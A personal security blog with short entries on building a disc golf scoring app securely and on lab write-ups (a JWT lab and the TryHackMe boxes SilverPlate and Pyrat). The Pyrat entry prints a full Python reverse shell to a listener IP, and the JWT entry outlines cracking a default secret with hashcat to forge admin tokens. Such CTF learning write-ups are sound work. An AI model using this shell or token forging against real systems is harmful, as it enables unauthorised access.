MENU
About New to Security Networking in Charlotte NC
...

Securing Sports

I built an application for keeping score at an IT disc golf event.

One of the more interesting aspects of making this in three weeks was implementing secure development practices throught the process.

I found my awareness and practical experienc useful while

  • Designing the architecture and flow of data
  • Identifying the risk profile in context of the event and application functions
  • Identifying potential attack chains
  • Implementing best practices for handling data and game state
  • Avoiding easy footholds for attackers on the frontend

    • The primary issue was avoiding defacement and data compromise via XSS and CSV command injection. Whitelisting on the frontend and backend proved sufficient to block any payloads that would affect the player scores or alter the leaderboard.

    To mitigate DOS, I tested the limits of the backend with custom Python scripts. I also chose a hosting provider that offered infrastructure with built-in protections. I also implemented agents.md and robots.txt files

    Another consideration was access. I created a throwaway admin account that only I had the password to. 2FA was enabled, and I only allowed admin access to the backend.

    As far as player usage, I avoided developing an auth system due to the way the event was structured (and the timeline for development). Players would be assigned a QR code that ties to their scorecard.

    In theory, players could submit phony scores. In practice, given the way QR codes were handled and the tools accessible, this was not a concern. An admin could fix scores if such an issue occurred on the admin panel.

    JWT

    Worked on a lab over the past two days that, among other vulnerabilities (SSRF, XSS), included default JWT secrets.

    There are several attack vectors that exist with poor JWT implementations. I found the explanation linked below to be better than anything I could say myself.

    Success came when I took a valid JWT after logging in, used hashcat to brute force this token for a secret key in a wordlist of common jwt key defaults, and used this key in BurpSuite to sign with a payload of my choice. This provided access to the admin panel of the website.

    I wish I could say I did this first. Unfortunately, I tried sending requets without the JWT, manipulating the algorithm type, signing with my own key... it took a day to regroup and find the right exploit.

    1

    SilverPlate - TryHackMe Box

    So far, this lab has been my favorite - the application being used has tons of vulnerabilities, and it requires a lot of looking around to get what is needed.

    A nmap scan reveals http services on two different ports. The main website mentions the use of Silverpeas - some sort of admin/forum panel from the looks of things. The documentation advises on what this endpoint looks like by default.

    Some quick Googling reveals the application has several established vulnerabilities and default login credentials.

    As you might imagine, getting into the user (and admin!) panel is a matter of following the documented login issue.

    While walking the application, I made not of times where the URL parameters looked suspicious, entry points for XSS, and admin ability to create LDAP domains.

    This LDAP functionality intrigued me, and unfortunately distracted me from the more obvious credentials availabe via broken access control. I'm not very experienced with LDAP, and wanted to see if I could create a domain and access it from my machine. This proved to be unsuccessful, as no LDAP port appeared open after subsequent scanning.

    Pyrat - TryHackMe Box

    It took an hour to get the first step of this exploit. I had trouble building a functional socket in python, so I tried netcat to reach the HTTP server. It worked!

    A few interactions made it clear that the server was parsing input as Python. However, I wasn't getting any human readable output. I opted to send a reverse shell connecting to a netcat listener on my end. Fortunately, it worked (albeit with many typos and groaning along the way). 

            
import os;
import subprocess;
import socket;
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.connect(("10.10.24.249", 4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash", "-i"]);

    I got stuck from here as to how to gain root access. I cannot read or move the etc/shadow, so cracking passwords is not an option for me. Getcap has not yielded any useful information. I cannot write or modify files. I cannot use any cron services or existing processes. I was unable to find any older app versions after fuzzing for various phrases/extension (.py, .conf, app, pyrat). I considered changing the sshd_config file, but did not see how that would prove to be useful.

    So, I did the responsible thing and looked to see what other experienced people would do. I had not considered looking for Git commits, which turned out to be the source of functional credentials!